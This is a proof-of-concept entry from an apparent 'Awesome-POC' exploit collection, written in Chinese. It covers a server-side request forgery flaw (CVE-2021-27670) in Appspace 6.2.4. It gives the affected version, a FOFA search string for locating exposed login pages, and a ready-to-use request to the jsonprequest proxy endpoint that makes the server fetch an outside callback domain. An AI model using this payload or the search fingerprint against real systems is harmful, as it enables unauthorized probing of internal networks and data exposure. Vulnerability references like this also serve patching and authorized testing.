Awesome-POC/Web应用漏洞/Appspace jsonprequest SSRF漏洞 CVE-2021-27670.md

31 lines
581 B
Markdown
Raw Normal View History

2022-05-24 17:29:00 +08:00
# Appspace jsonprequest SSRF漏洞 CVE-2021-27670
## 漏洞描述
Appspace 6.2.4存在漏洞允许通过api/v1/core/proxy/jsonprequest接口来进行服务端请求伪造危害系统安全。
## 漏洞影响
```
Appspace 6.2.4
```
## FOFA
```
"Sign-in-to-Appspace-Core"
```
## 漏洞复现
登录页面为
2022-12-05 11:09:28 +08:00
![image-20220524140826821](./images/202205241408911.png)
2022-05-24 17:29:00 +08:00
验证POC
```
/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://db0bx.2lfmar.yourdomain.xyz
```
2022-12-05 11:09:28 +08:00
![image-20220524141221709](./images/202205241412770.png)